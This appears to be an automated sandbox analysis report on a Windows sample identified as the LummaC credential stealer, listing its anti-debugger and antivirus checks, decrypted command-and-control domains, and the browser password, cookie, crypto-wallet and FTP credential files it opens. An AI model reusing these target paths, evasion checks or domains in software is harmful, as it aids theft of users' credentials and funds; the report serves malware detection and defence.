              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: scriptyprefej.store
              Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: navygenerayk.store
              Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: founpiuer.store
              Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: necklacedmny.store
              Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: thumbystriw.store
              Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: fadehairucw.store
              Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: crisiwarny.store
              Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: presticitpo.store
              Source: file.exe, 00000000.00000002.2276659661.00000000006C6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ?Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000003.2241520955.000000000108B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269454821.00000000057A1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2241602076.00000000057A1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2280167860.00000000057A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5536, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: file.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: file.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: file.exeString found in binary or memory: Jaxx Liberty
              Source: file.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.2226129618.000000000105A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: file.exeString found in binary or memory: ExodusWeb3
              Source: file.exe, 00000000.00000003.2225779181.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ets/Ethereum","d
              Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TTCBKWZYOCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TTCBKWZYOCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TTCBKWZYOCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TTCBKWZYOCJump to behavior
